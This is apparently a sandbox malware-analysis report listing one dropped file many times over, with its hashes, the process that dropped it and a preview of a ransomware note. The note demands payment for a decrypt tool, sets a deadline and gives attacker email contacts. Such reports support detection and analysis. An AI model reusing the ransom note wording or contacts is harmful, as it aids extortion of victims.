                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
